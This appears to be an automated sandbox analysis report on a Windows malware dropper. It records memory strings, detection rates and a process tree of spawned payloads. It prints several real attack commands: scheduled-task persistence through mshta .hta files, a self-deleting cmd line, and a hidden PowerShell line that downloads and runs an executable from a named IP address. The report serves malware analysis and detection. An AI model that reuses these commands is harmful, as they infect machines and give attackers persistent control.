                                      Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                                      Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                                      Source: m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                                      Source: m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                                      Source: m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                      Source: m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                      Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                                      Source: UD49QH6.exe, 00000010.00000003.1420564482.0000000005B87000.00000004.00000800.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1433395613.0000000005B8E000.00000004.00000800.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1421639776.0000000005B66000.00000004.00000800.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1433531574.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000003.1493556007.000000000066D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                      Source: m0wsoI3.exe, m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                                      Source: M6gQuZPvgY.exeVirustotal: Detection: 60%
                                      Source: M6gQuZPvgY.exeReversingLabs: Detection: 61%
                                      Source: M6gQuZPvgY.exeString found in binary or memory: " /add
                                      Source: M6gQuZPvgY.exeString found in binary or memory: " /add /y
                                      Source: M6gQuZPvgY.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                      Source: rapes.exeString found in binary or memory: " /add
                                      Source: rapes.exeString found in binary or memory: " /add /y
                                      Source: rapes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                      Source: rapes.exeString found in binary or memory: " /add
                                      Source: rapes.exeString found in binary or memory: " /add /y
                                      Source: rapes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                      Source: amnew.exeString found in binary or memory: " /add /y
                                      Source: amnew.exeString found in binary or memory: " /add
                                      Source: futors.exeString found in binary or memory: " /add /y
                                      Source: futors.exeString found in binary or memory: " /add
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeFile read: C:\Users\user\Desktop\M6gQuZPvgY.exeJump to behavior
                                      Source: unknownProcess created: C:\Users\user\Desktop\M6gQuZPvgY.exe "C:\Users\user\Desktop\M6gQuZPvgY.exe"
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
                                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
                                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe "C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe"
                                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeProcess created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe "C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe"
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe "C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe"
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe "C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe"
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe"
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe" & exit
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
                                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10235700121\am_no.cmd" "
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE "C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE"
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe "C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeProcess created: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe "C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "F80nHmaMuIn" /tr "mshta \"C:\Temp\J9hHfTRUK.hta\"" /sc minute /mo 25 /ru "user" /f
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\J9hHfTRUK.hta"
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe "C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe"
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe "C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe"
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeProcess created: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe "C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe"
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 888
                                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "C:\Temp\J9hHfTRUK.hta"
                                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe"
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn pmi96maNnhC /tr "mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta" /sc minute /mo 25 /ru "user" /f
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn pmi96maNnhC /tr "mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta" /sc minute /mo 25 /ru "user" /f
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\Conhost.exe
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe "C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe "C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe "C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10235700121\am_no.cmd" "Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe "C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeProcess created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe "C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe "C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe "C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe" Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeProcess created: unknown unknownJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe" & exit
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE "C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE"
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "F80nHmaMuIn" /tr "mshta \"C:\Temp\J9hHfTRUK.hta\"" /sc minute /mo 25 /ru "user" /f
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\J9hHfTRUK.hta"
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeProcess created: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe "C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeProcess created: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe "C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe"
                                      Source: C:\Windows\System32\mshta.exeProcess created: unknown unknown
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn pmi96maNnhC /tr "mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta" /sc minute /mo 25 /ru "user" /f
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn pmi96maNnhC /tr "mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta" /sc minute /mo 25 /ru "user" /f
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: winmm.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: sspicli.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: mstask.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: windows.storage.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: wldp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: mpr.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: dui70.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: duser.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: chartv.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: oleacc.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: atlthunk.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: textinputframework.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: coreuicomponents.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: coremessaging.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: ntmarta.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: coremessaging.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: wintypes.dllJump to behavior
